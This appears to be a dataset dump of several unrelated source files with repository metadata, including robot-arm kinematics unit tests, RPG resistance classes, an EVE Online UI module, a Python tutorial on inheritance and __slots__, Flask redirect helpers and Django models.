TT = panda.fkine(qq)
nt.assert_array_almost_equal(TT[0].A, ans)
nt.assert_array_almost_equal(TT[1].A, ans)
nt.assert_array_almost_equal(TT[2].A, ans)
nt.assert_array_almost_equal(TT[3].A, ans)
def test_allfkine(self):
pm = rp.PandaMDH()
p = rp.Panda()
q = [1, 2, 3, 4, 5, 6, 7]
p.q = q
pm.q = q
p.allfkine()
r2 = pm.allfkine()
for i in range(7):
nt.assert_array_almost_equal(p.ets[i]._fk.A, r2[i].A)
p.allfkine(q)
for i in range(7):
nt.assert_array_almost_equal(p.ets[i]._fk.A, r2[i].A)
def test_jacob0(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[-1.61683957e-01, 1.07925929e-01, -3.41453006e-02,
3.35029257e-01, -1.07195463e-02, 1.03187865e-01,
0.00000000e+00],
[4.46822947e-01, 6.25741987e-01, 4.16474664e-01,
-8.04745724e-02, 7.78257566e-02, -1.17720983e-02,
0.00000000e+00],
[0.00000000e+00, -2.35276631e-01, -8.20187641e-02,
-5.14076923e-01, -9.98040745e-03, -2.02626953e-01,
0.00000000e+00],
[1.29458954e-16, -9.85449730e-01, 3.37672585e-02,
-6.16735653e-02, 6.68449878e-01, -1.35361558e-01,
6.37462344e-01],
[9.07021273e-18, 1.69967143e-01, 1.95778638e-01,
9.79165111e-01, 1.84470262e-01, 9.82748279e-01,
1.83758244e-01],
[1.00000000e+00, -2.26036604e-17, 9.80066578e-01,
-1.93473657e-01, 7.20517510e-01, -1.26028049e-01,
7.48247732e-01]
])
panda.q = q1
nt.assert_array_almost_equal(panda.jacob0(), ans)
nt.assert_array_almost_equal(panda.jacob0(q2), ans)
nt.assert_array_almost_equal(panda.jacob0(q3), ans)
nt.assert_array_almost_equal(panda.jacob0(q4), ans)
self.assertRaises(TypeError, panda.jacob0, 'Wfgsrth')
def test_hessian0(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[
[-4.46822947e-01, -6.25741987e-01, -4.16474664e-01,
8.04745724e-02, -7.78257566e-02, 1.17720983e-02,
0.00000000e+00],
[-6.25741987e-01, -3.99892968e-02, -1.39404950e-02,
-8.73761859e-02, -1.69634134e-03, -3.44399243e-02,
0.00000000e+00],
[-4.16474664e-01, -1.39404950e-02, -4.24230421e-01,
-2.17748413e-02, -7.82283735e-02, -2.81325889e-02,
0.00000000e+00],
[8.04745724e-02, -8.73761859e-02, -2.17748413e-02,
-5.18935898e-01, 5.28476698e-03, -2.00682834e-01,
0.00000000e+00],
[-7.78257566e-02, -1.69634134e-03, -7.82283735e-02,
5.28476698e-03, -5.79159088e-02, -2.88966443e-02,
0.00000000e+00],
[1.17720983e-02, -3.44399243e-02, -2.81325889e-02,
-2.00682834e-01, -2.88966443e-02, -2.00614904e-01,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[-1.61683957e-01, 1.07925929e-01, -3.41453006e-02,
3.35029257e-01, -1.07195463e-02, 1.03187865e-01,
0.00000000e+00],
[1.07925929e-01, -2.31853293e-01, -8.08253690e-02,
-5.06596965e-01, -9.83518983e-03, -1.99678676e-01,
0.00000000e+00],
[-3.41453006e-02, -8.08253690e-02, -3.06951191e-02,
3.45709946e-01, -1.01688580e-02, 1.07973135e-01,
0.00000000e+00],
[3.35029257e-01, -5.06596965e-01, 3.45709946e-01,
-9.65242924e-02, 1.45842251e-03, -3.24608603e-02,
0.00000000e+00],
[-1.07195463e-02, -9.83518983e-03, -1.01688580e-02,
1.45842251e-03, -1.05221866e-03, 2.09794626e-01,
0.00000000e+00],
[1.03187865e-01, -1.99678676e-01, 1.07973135e-01,
-3.24608603e-02, 2.09794626e-01, -4.04324654e-02,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00],
[0.00000000e+00, -6.34981134e-01, -4.04611266e-01,
2.23596800e-02, -7.48714002e-02, -5.93773551e-03,
0.00000000e+00],
[0.00000000e+00, -4.04611266e-01, 2.07481281e-02,
-6.83089775e-02, 4.72662062e-03, -2.05994912e-02,
0.00000000e+00],
[0.00000000e+00, 2.23596800e-02, -6.83089775e-02,
-3.23085806e-01, 5.69641385e-03, -1.00311930e-01,
0.00000000e+00],
[0.00000000e+00, -7.48714002e-02, 4.72662062e-03,
5.69641385e-03, 5.40000550e-02, -2.69041502e-02,
0.00000000e+00],
[0.00000000e+00, -5.93773551e-03, -2.05994912e-02,
-1.00311930e-01, -2.69041502e-02, -9.98142073e-02,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[-9.07021273e-18, -2.77555756e-17, -2.77555756e-17,
-1.11022302e-16, -2.77555756e-17, 0.00000000e+00,
-2.77555756e-17],
[-1.69967143e-01, -1.97756387e-17, 4.11786040e-17,
-1.48932398e-16, -5.07612940e-17, -8.38219650e-17,
-4.90138154e-17],
[-1.95778638e-01, 1.66579116e-01, -1.38777878e-17,
1.04083409e-17, -1.38777878e-17, 3.46944695e-18,
0.00000000e+00],
[-9.79165111e-01, -3.28841647e-02, -9.97525009e-01,
-4.16333634e-17, -1.14491749e-16, 1.38777878e-17,
-6.24500451e-17],
[-1.84470262e-01, 1.22464303e-01, -3.97312016e-02,
7.41195745e-01, -2.77555756e-17, 1.12757026e-16,
2.77555756e-17],
[-9.82748279e-01, -2.14206274e-02, -9.87832342e-01,
6.67336352e-02, -7.31335770e-01, 2.08166817e-17,
-6.07153217e-17],
[-1.83758244e-01, 1.27177529e-01, -3.36043908e-02,
7.68210453e-01, 5.62842325e-03, 7.58497864e-01,
0.00000000e+00]
],
[
[1.29458954e-16, -1.11022302e-16, 8.67361738e-17,
-4.16333634e-17, 5.55111512e-17, 2.77555756e-17,
5.55111512e-17],
[-9.85449730e-01, -6.36381327e-17, -1.02735399e-16,
-1.83043043e-17, -5.63484308e-17, 8.08886307e-18,
1.07112702e-18],
[3.37672585e-02, 9.65806345e-01, 8.32667268e-17,
-2.55871713e-17, 1.07552856e-16, 2.08166817e-17,
-5.20417043e-18],
[-6.16735653e-02, -1.90658563e-01, -5.39111251e-02,
-6.59194921e-17, -2.77555756e-17, 2.38524478e-17,
-4.16333634e-17],
[6.68449878e-01, 7.10033786e-01, 6.30795483e-01,
-8.48905588e-02, 0.00000000e+00, 3.46944695e-17,
2.77555756e-17],
[-1.35361558e-01, -1.24194307e-01, -1.28407717e-01,
1.84162966e-02, -1.32869389e-02, 2.77555756e-17,
-2.08166817e-17],
[6.37462344e-01, 7.37360525e-01, 5.99489263e-01,
-7.71850655e-02, -4.08633244e-02, 2.09458434e-02,
0.00000000e+00]
],
[
[0.00000000e+00, -6.59521910e-17, -1.31033786e-16,
-1.92457571e-16, 1.54134782e-17, -7.69804929e-17,
1.11140361e-17],
[0.00000000e+00, -2.77555756e-17, 7.15573434e-17,
1.65666092e-16, 1.38777878e-17, -8.67361738e-18,
3.46944695e-17],
[0.00000000e+00, -1.98669331e-01, 8.67361738e-18,
-1.46584134e-16, 6.02816408e-17, -3.12250226e-17,
6.11490025e-17],
[0.00000000e+00, -9.54435515e-01, 4.51380881e-02,
1.38777878e-17, 1.08420217e-16, 3.46944695e-18,
6.24500451e-17],
[0.00000000e+00, -2.95400686e-01, -1.24639152e-01,
-6.65899738e-01, -4.85722573e-17, -5.20417043e-18,
-5.55111512e-17],
[0.00000000e+00, -9.45442009e-01, 5.96856167e-02,
7.19317248e-02, 6.81888149e-01, -2.77555756e-17,
1.04083409e-17],
[0.00000000e+00, -2.89432165e-01, -1.18596498e-01,
-6.35513913e-01, 5.24032975e-03, -6.51338823e-01,
0.00000000e+00]
]
])
panda.q = q1
nt.assert_array_almost_equal(panda.hessian0(), ans)
nt.assert_array_almost_equal(panda.hessian0(q2), ans)
nt.assert_array_almost_equal(panda.hessian0(q3), ans)
nt.assert_array_almost_equal(panda.hessian0(q4), ans)
nt.assert_array_almost_equal(panda.hessian0(J0=panda.jacob0(q1)), ans)
nt.assert_array_almost_equal(panda.hessian0(
q1, J0=panda.jacob0(q1)), ans)
# self.assertRaises(ValueError, panda.hessian0)
self.assertRaises(ValueError, panda.hessian0, [1, 3])
self.assertRaises(TypeError, panda.hessian0, 'Wfgsrth')
self.assertRaises(
ValueError, panda.hessian0, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.hessian0, [1, 3], 'qwe')
def test_manipulability(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = 0.006559178039088341
panda.q = q1
nt.assert_array_almost_equal(panda.manipulability(), ans)
nt.assert_array_almost_equal(panda.manipulability(q2), ans)
nt.assert_array_almost_equal(panda.manipulability(q3), ans)
nt.assert_array_almost_equal(panda.manipulability(q4), ans)
# self.assertRaises(ValueError, panda.manipulability)
self.assertRaises(TypeError, panda.manipulability, 'Wfgsrth')
self.assertRaises(
ValueError, panda.manipulability, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.manipulability, [1, 3], 'qwe')
def test_jacobm(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[1.27080875e-17],
[2.38242538e-02],
[6.61029519e-03],
[8.18202121e-03],
[7.74546204e-04],
[-1.10885380e-02],
[0.00000000e+00]
])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobm(), ans)
nt.assert_array_almost_equal(panda.jacobm(q2), ans)
nt.assert_array_almost_equal(panda.jacobm(q3), ans)
nt.assert_array_almost_equal(panda.jacobm(q4), ans)
nt.assert_array_almost_equal(panda.jacobm(J=panda.jacob0(q1)), ans)
# self.assertRaises(ValueError, panda.jacobm)
self.assertRaises(TypeError, panda.jacobm, 'Wfgsrth')
self.assertRaises(ValueError, panda.jacobm, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.jacobm, [1, 3], 'qwe')
self.assertRaises(
TypeError, panda.jacobm, [1, 3], panda.jacob0(q1), [1, 2, 3])
self.assertRaises(
ValueError, panda.jacobm, [1, 3], panda.jacob0(q1),
np.array([1, 2, 3]))
def test_jacobev(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobev(), pdh.jacobev(q1))
def test_jacob0v(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacob0v(), pdh.jacob0v(q1))
def test_jacobe(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobe(), pdh.jacobe(q1))
nt.assert_array_almost_equal(panda.jacobe(q1), pdh.jacobe(q1))
def test_init(self):
l0 = rp.ELink()
l1 = rp.ELink()
r = rp.ETS([l0, l1], base=sm.SE3.Rx(1.3), base_link=l1, ee_link=l0)
r.base_link = l1
r.base_link = 0
r.ee_link = 1
with self.assertRaises(TypeError):
rp.ETS(l0, base=sm.SE3.Rx(1.3))
with self.assertRaises(TypeError):
rp.ETS([1, 2], base=sm.SE3.Rx(1.3))
def test_dict(self):
panda = rp.PandaURDF()
panda.to_dict()
wx = rp.wx250s()
wx.to_dict()
def test_fkdict(self):
panda = rp.PandaURDF()
fkd = panda.fk_dict()
for i in range(len(panda.ets)):
nt.assert_array_almost_equal(
panda.ets[i]._fk.t,
fkd['links'][i]['t'])
def test_qlim(self):
panda = rp.PandaURDF()
self.assertEqual(panda.qlim.shape[0], 2)
self.assertEqual(panda.qlim.shape[1], panda.n)
def test_manuf(self):
panda = rp.PandaURDF()
self.assertIsInstance(panda.manuf, str)
def test_complex(self):
l0 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRx()])
l1 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRy()], parent=l0)
l2 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRz()], parent=l1)
l3 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Ttx()], parent=l2)
l4 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Tty()], parent=l3)
l5 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Ttz()], parent=l4)
r = rp.ETS([l0, l1, l2, l3, l4, l5])
r.q = [1, 2, 3, 1, 2, 3]
ans = np.array([
[-0., 0.08752679, -0.74761985, 0.41198225, 0.05872664, 0.90929743],
[1.46443609, 2.80993063, 0.52675075, -0.68124272, -0.64287284,
0.35017549],
[-1.04432, -1.80423571, -2.20308833, 0.60512725, -0.76371834,
-0.2248451],
[1., 0., 0.90929743, 0., 0., 0.],
[0., 0.54030231, 0.35017549, 0., 0., 0.],
[0., 0.84147098, -0.2248451, 0., 0., 0.]
])
nt.assert_array_almost_equal(r.jacob0(), ans)
# def test_plot(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False)
# e.close()
# def test_plot_complex(self):
# l0 = rp.ET.TRz()
# l1 = rp.ET.Ttx()
# l2 = rp.ET.TRy()
# l3 = rp.ET.Ttz(1)
# l4 = rp.ET.TRx()
# E = rp.ETS([l0, l1, l2, l3, l4])
# e = E.plot(block=False)
# e.step(0)
# e.close()
# def test_teach(self):
# l0 = rp.ET.TRz()
# l1 = rp.ET.Ttx()
# l2 = rp.ET.TRy()
# l3 = rp.ET.Ttz(1)
# l4 = rp.ET.TRx()
# E = rp.ETS([l0, l1, l2, l3, l4])
# e = E.teach(block=False, q=[1, 2, 3, 4])
# e.close()
# def test_plot_traj(self):
# panda = rp.Panda()
# q = np.random.rand(7, 3)
# e = panda.plot(block=False, q=q, dt=0)
# e.close()
def test_control_type2(self):
panda = rp.Panda()
panda.control_type = 'p'
with self.assertRaises(ValueError):
panda.control_type = 'z'
# def test_plot_vellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot_vellipse(block=False, limits=[1, 2, 1, 2, 1, 2])
# e.close()
# e = panda.plot_vellipse(
# block=False, q=panda.qr, centre='ee', opt='rot')
# e.step(0)
# e.close()
# with self.assertRaises(TypeError):
# panda.plot_vellipse(vellipse=10)
# with self.assertRaises(ValueError):
# panda.plot_vellipse(centre='ff')
# def test_plot_fellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot_fellipse(block=False, limits=[1, 2, 1, 2, 1, 2])
# e.close()
# e = panda.plot_fellipse(
# block=False, q=panda.qr, centre='ee', opt='rot')
# e.step(0)
# e.close()
# with self.assertRaises(TypeError):
# panda.plot_fellipse(fellipse=10)
# with self.assertRaises(ValueError):
# panda.plot_fellipse(centre='ff')
# def test_plot_with_vellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False, vellipse=True)
# e.close()
# def test_plot_with_fellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False, fellipse=True)
# e.close()
# def test_plot2(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot2(block=False, name=True)
# e.close()
# def test_plot2_traj(self):
# panda = rp.Panda()
# q = np.random.rand(7, 3)
# e = panda.plot2(block=False, q=q, dt=0)
# e.close()
# def test_teach2(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.teach(block=False)
# e.close()
# e2 = panda.teach2(block=False, q=panda.qr)
# e2.close()
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
88bd31ecc6bd237466ec96a185b1d943f4ead144 | 2d060eb9c7126b8963adcad857daa6e39c6ac75f | /Resist.py | 12e4f998383248c49443c1a4b9fc74c578754390 | [] | no_license | easy-rpg/Filler | 43ce36980156f4ffd9597d822e9fa6c19105d892 | 55cddbbb21ac508f64b98ceedbc30c680d4c4951 | refs/heads/master | 2020-03-15T01:38:51.069870 | 2016-09-03T07:12:55 | 2016-09-03T07:12:55 | 131,898,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | import abc
class Resist_Boa(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class')
class Resist_Ruim(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6]
@abc.abstractmethod
def __str__(self):
        raise NotImplementedError('users must define __str__ to use this base class')
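# Illustrative concrete subclasses (names assumed here, not from the original
# module): the ABCs above only require __str__, and 'valores' reads like a
# per-level saving-throw bonus table.
class Fortitude(Resist_Boa):
    def __str__(self):
        return 'Fortitude (good): ' + ', '.join(str(v) for v in self.valores)

class Reflex(Resist_Ruim):
    def __str__(self):
        return 'Reflex (poor): ' + ', '.join(str(v) for v in self.valores)
 | [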
"[email protected]"
] | |
1c29302c75eba77721ac08ae1689249996414741 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/client/script/ui/station/fitting/stanceSlot.py | 4f84e19f8e8023622408b00954931ab6ab6a422f | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,646 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\ui\station\fitting\stanceSlot.py
from carbonui.primitives.container import Container
from eve.client.script.ui.inflight import shipstance
import carbonui.const as uiconst
class StanceSlots(Container):
def __init__(self, **kw):
super(StanceSlots, self).__init__(**kw)
def _GetAngles(self):
return [ 258 - i * 10 for i in xrange(3) ]
def ApplyAttributes(self, attributes):
Container.ApplyAttributes(self, attributes)
self.controller = attributes.controller
typeID = attributes.typeID
if typeID is None:
typeID = sm.GetService('invCache').GetInventoryFromId(attributes.shipID).GetItem().typeID
self.shipstances = []
for angle in self._GetAngles():
pos = attributes.angleToPos(angle)
newPos = (pos[0],
pos[1],
32,
32)
self.shipstances.append(shipstance.ShipStanceFittingButton(shipID=attributes.shipID, typeID=typeID, parent=self, pos=newPos, align=uiconst.TOPLEFT, controller=self.controller))
def ShowStances(self, shipID, typeID):
btnControllerClass = self.controller.GetStanceBtnControllerClass()
shipStanceButtonsArgs = btnControllerClass().get_ship_stance_buttons_args(typeID, shipID)
for idx, kwargs in enumerate(shipStanceButtonsArgs):
stanceButton = self.shipstances[idx]
stanceButton.SetAsStance(shipID, typeID, kwargs['stanceID'], kwargs['stance'])
def GetStanceContainers(self):
return self.shipstances
| [
"[email protected]"
] | |
09da3887cf75a54b9d1965126cebae0ddf5f6475 | 6929f9696a8f90b3778d449a199cee8891f3f739 | /python_core/deligating_to_parent_class_and_slots.py | c23b6fab9843575d3946b69e50da5f32471b0dc8 | [] | no_license | chemplife/Python | 881d492a4271fb2b423f2dd611eaac53a0efdc34 | 7fdfbf442a915e4f41506503baad4345a52d1e86 | refs/heads/master | 2022-12-31T20:00:22.475985 | 2020-10-19T20:14:43 | 2020-10-19T20:14:43 | 305,503,403 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,720 | py | '''
super().method()/attribute
-> To delegate things back to the parent class.
-> Use this only when the child class has a method of the same name as well.. because Python will anyway look up the hierarchy
   if it does not find the method in the Child-class.
   Eg: class A:
           def b():
       class B(A):
           def c():
               return self.b() <- is same as -> return super().b() <- because 'class B' does not have a 'def b()' of its own.

self: binds the instance of the object to the method anywhere in the hierarchy.

** if the 'Parent-Class' has an '__init__(self, name)' method that takes in an argument and the 'Child-Class' does not have an '__init__(self)' defined:
   -> the 'Child-Class' instance needs that argument (name) because it is inherited from the 'Parent-Class'
'''
class Person:
def hello(self):
print('In Person Class: ', self)
class Student(Person):
def hello(self):
print('In Student Class: ', self)
super().hello()
p = Person()
s = Student()
p.hello()
print('\n')
# Looks at the address of 'self'.. it is the same in 'Person Class' as it is for 'Student Class'
s.hello()
print('\n\n-------------------------------- Combined Example: Property/Inheritance/Deligate/Caching --------------------------------')
from math import pi
from numbers import Real
class Circle:
def __init__(self, r):
self.radius = r
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
@radius.setter
def radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle(Circle):
def __init__(self):
super().__init__(1)
u = UnitCircle()
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#But this will work..
u.radius = 10
print('\nProblem: UnitCircle Radius:', u.radius)
# To make the Radius for Unit-Circle read-only..
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
        return super().radius  # NOTE: 'return self.radius' here would recurse forever, since it re-enters this same property.
# Now even creating a UnitCircle_1 will not work: the overriding property is read-only (it has no setter),
# so the 'self.radius = r' assignment inside Circle.__init__() raises an AttributeError.
# ** we cannot call the 'radius.setter' from outside of the class.
# u1 = UnitCircle_1()
# u1.radius = 10
# print('\nProblem: UnitCircle_1 Radius:', u1.radius)
# To fix this, we need to make 'Circle.__init__()' call a plain method to set the radius..
class Circle:
def __init__(self, r):
self._set_radius(r)
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
def _set_radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@radius.setter
def radius(self, r):
self._set_radius(r)
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
return super().radius
u = UnitCircle_1()
print('\n')
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#Now this will not work..
# u.radius = 10
# print('\nProblem: UnitCircle Radius:', u.radius)
print('\n\n------------------------------------------- Slots -------------------------------------------\n')
'''
Classes inherently use a 'DICTIONARY' to store all the attributes.
But when we have a lot of instances of the class.. it creates a lot of memory overhead..
To do it in a more memory-efficient way.. SLOTS are used
Slots - a more compact data structure that Python provides.
We need to tell slots in advance which attributes we will have.

__slots__ = ('x', 'y')
	('x', 'y') -> Iterable..
	__slots__ -> tells Python: don't use a dictionary.. use slots..

Now, both of these will give an error
	-> obj.__dict__	: Attribute Error
	-> vars(obj)	: Type Error
But -> dir(obj)	: will tell us about 'x' and 'y'

Slots V/S Dict
	-> Slots are 'Memory-Efficient'	: save about 10 times the memory compared to Dict.
	-> Slots are 'Time-Efficient'	: run about 30% faster than Dict.
	-> Slots: cannot add attributes (Monkey-Patching) during the program.. with Dict, we can add attributes on the fly..
'''
class Location:
__slots__ = 'name', '_longitude', '_latitude'
def __init__(self, name, *, longitude, latitude):
self._longitude = longitude
self._latitude = latitude
self.name = name
@property
def longitude(self):
return self._longitude
@property
def latitude(self):
return self._latitude
print('Location Dict: ', Location.__dict__)
Location.map_service = 'Google Maps'
print('\nLocation Dict after Attribute Addition: ', Location.__dict__)
#But we don't have Instance-Dictionary
l = Location('Delhi', longitude=100, latitude=72)
# print('\nLocation Instance Dict: ', l.__dict__)
print('\n\n--------------------------- Slots with Single Inheritance ---------------------------\n')
'''
-> A 'Child-Class' will use the 'slots' FROM the 'Parent-Class' if present. But the 'Child-Class' will have its own '__dict__' to store attributes.
-> A 'Child-Class' can have 'slots' even if the 'Parent-Class' DOESN'T have them. The 'Child-Class' will still have a '__dict__' to store attributes.
-> If the Child-Class also needs 'Slots', mention only those in the 'Child-Class' which are not in the 'Parent-Class'.. Don't re-mention attributes.
-> If re-mentioned:
	-> In future updates of Python it may break (it is marked to get a 'check' in the future.)
	-> It hides the Parent attribute and can cause problems.
	-> It increases memory overhead due to the re-mentioning..

************************
How to use both 'Slots' and '__dict__'?
-> __slots__ = 'attributes', .. , '__dict__'
-> Now, we can add more attributes during run-time.. (__dict__ is not dropped..)
-> Newly added attributes will get stored in '__dict__' and not in 'slots'
'''
class Person:
__slots__ = 'name'
class Student(Person):
pass
p = Person()
s = Student()
s.name = 'Alex'
print('Student Instance Dict: ', s.__dict__)
s.age = 18
print('\nStudent Instance Dict: ', s.__dict__)
# This will not work: Person defines __slots__ (and no '__dict__'),
# so accessing p.__dict__ raises AttributeError.
# print('Person Instance Dict: ', p.__dict__)
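# Illustrative sketch (added, not in the original lesson) of the pattern
# described above: listing '__dict__' inside __slots__ keeps slot storage for
# the named attributes while still allowing extra attributes at runtime.
class Point:
    __slots__ = 'x', 'y', '__dict__'
    def __init__(self, x, y):
        self.x = x          # stored in a slot
        self.y = y          # stored in a slot
pt = Point(1, 2)
pt.label = 'origin-ish'     # allowed: goes into the instance __dict__
print('\nPoint instance dict holds only the extras:', pt.__dict__)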
| [
"[email protected]"
] | |
d022d56454d570a5b887704c79d4d2843271f345 | 576cc83449e10fd3f98281970c46016ea7a5aea2 | /OpenCV拟合与特征点识别/模板匹配角度.py | 78abfbc17a54a507b14bd408976b16d378badf18 | [] | no_license | HotView/PycharmProjects | 215ab9edd341e3293daebcf86d97537f8cd28d75 | 61393fe5ba781a8c1216a5cbe7e0d06149a10190 | refs/heads/master | 2020-06-02T07:41:53.608742 | 2019-11-13T08:31:57 | 2019-11-13T08:31:57 | 191,085,178 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | import math
# math.atan returns the angle in radians; multiply by 180/pi to get degrees.
a = math.atan(2/3)
c = math.atan(1)
print(c*180/math.pi)  # 45.0
print(a*180/math.pi)  # ~33.69
# theta1 = math.tanh(a)
# print(theta1)
b = math.atan(6/2)
print(b*180/math.pi)  # ~71.57
| [
"[email protected]"
] | |
cce1e5cc0fba01f33051132e3981e03cec379801 | a070182e6443995031340802e74d1e65a85bdca3 | /bluelog/utils.py | 4975d944d9c5eebe4486d47ab3fea78ee7fa681c | [] | no_license | huazhicai/bluelog | f86a042a5f3ada46515920c45a0b1452a40d4ad9 | c2a46ac25cbba4ecf7d4e0985ef9010ddae34c01 | refs/heads/master | 2020-04-04T16:33:27.910658 | 2019-01-03T09:59:52 | 2019-01-03T09:59:52 | 156,082,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | try:
from urlparse import urlparse, urljoin
except ImportError:
from urllib.parse import urlparse, urljoin
from flask import request, redirect, url_for
def is_safe_url(target):
    # Guard against open redirects: only allow http(s) URLs on our own host.
    ref_url = urlparse(request.host_url)
    test_url = urlparse(urljoin(request.host_url, target))
    return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def redirect_back(default='blog.index', **kwargs):
    # Prefer an explicit ?next= target, then the HTTP referrer, then the default.
    for target in request.args.get('next'), request.referrer:
        if not target:
            continue
        if is_safe_url(target):
            return redirect(target)
    return redirect(url_for(default, **kwargs))
| [
"[email protected]"
] | |
d69a39808d6f68572bc01c15f5e876462397f0eb | 4dac40a30e7bbb86ab829fed0cb6f12ff7fa0216 | /djwiki/wiki/models.py | 0e7d732c83f68d3e3e9fb72063d8346168ff24ae | [] | no_license | gzpgg3x/pythonDiary | cc039b716c810f99d5a12b0f4167a711cd6ea18f | 0c3af53dc635d5ff40adad89dce146d6684e162e | refs/heads/master | 2021-01-10T19:55:41.130511 | 2013-04-21T04:37:10 | 2013-04-21T04:37:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from django.db import models
class Page(models.Model):
name = models.CharField(max_length=40, unique=True)
content = models.TextField()
def __unicode__(self):
return self.name | [
"[email protected]"
] | |
26952bdc611861509bd368811c1b243e394f7d45 | a32049cdf8cb3403e8e54ddd661f8bb506cca99b | /first_project/first_app/urls.py | f627fd5ffdf7c929f3138c22f3c628b8dc0cf27b | [] | no_license | akhileshvvn/django-deployment-example | 5a3beb8205f2905c99808e983baaf0f8a7a23772 | 45317bb6166527054541e52c8a986f44342ea958 | refs/heads/master | 2022-04-15T08:17:02.615307 | 2020-04-11T07:54:19 | 2020-04-11T07:54:19 | 254,815,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | from django.urls import path,re_path
